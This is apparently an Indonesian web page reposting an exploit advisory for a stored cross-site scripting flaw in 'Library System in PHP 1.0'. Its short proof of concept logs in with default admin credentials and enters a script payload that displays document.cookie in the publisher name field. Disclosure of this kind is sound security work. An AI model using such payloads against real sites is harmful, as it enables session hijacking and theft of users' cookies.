Sistem Pustaka Dalam Scripting Lintas Situs PHP 1.0

  • Whatsapp
WordPress Catch Themes Demo Impor 1.6.1 Unggah Shell
WordPress Catch Themes Demo Impor Unggah Shell

Sistem Perpustakaan di PHP versi 1.0 mengalami kerentanan skrip lintas situs yang persisten.

MD5 | 8ef71abb9929b9725860901152153f3e

# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 03-OCT-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage:
# Software Link:
# Version: V 1.0
# Tested on: WAMPP
# Description #

Library System in PHP V1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitisation.

# Proof of Concept (PoC) :
1) Goto: http://localhost/library-system/dashboard.php
2) Login as admin using test credentials: admin/admin
3) Goto: http://localhost/library-system/update-publisher.php?pid=12
4) Enter the following payload in the publisher field: <script>alert(document.cookie)</script>
5) Click on Save
6) Our payload is fired and stored

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.